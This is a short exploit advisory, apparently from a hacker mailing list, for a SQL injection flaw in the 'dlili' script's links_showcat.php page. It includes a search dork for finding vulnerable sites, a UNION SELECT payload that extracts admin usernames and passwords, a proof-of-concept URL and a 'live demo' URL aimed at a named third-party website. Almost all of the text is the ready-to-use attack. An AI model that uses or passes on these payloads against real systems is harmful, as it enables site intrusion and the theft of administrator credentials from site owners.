==============================================================================
                  Remote SQL Injection Vulnerability
  ==============================================================================
    [+] Published:           [2010-02-02]
    [+] Script:              [ dlili ]
    [+] Script site:         [ http://www.dlili.com ]
    [+] Author:              {Dr.DaShEr> Nyo@hotmail.com < ]
    [+] Gr44tz to:           [NeX HackEr & XP10_hacker]
  ########################################################################


   [+] Dork: inurl:"links_showcat.php?"


   =[ Exploit ]=

   [+] links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin


   [-] SQLi p0c:

   [+] http://localhost/[path]/links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin


   [-] Demo Live:

   [+] http://fox-sy.com/links_showcat.php?id=2%20and%201=0%20UNION%20SELECT%201,concat%28username,0x3a,password%29,3,4%20from%20admin



  ###########################################################################


________________________________
Hotmail: خدمة بريد إلكتروني مجانية وموثوق بها وغنية. اشترك الآن.<https://signup.live.com/signup.aspx?id=60969>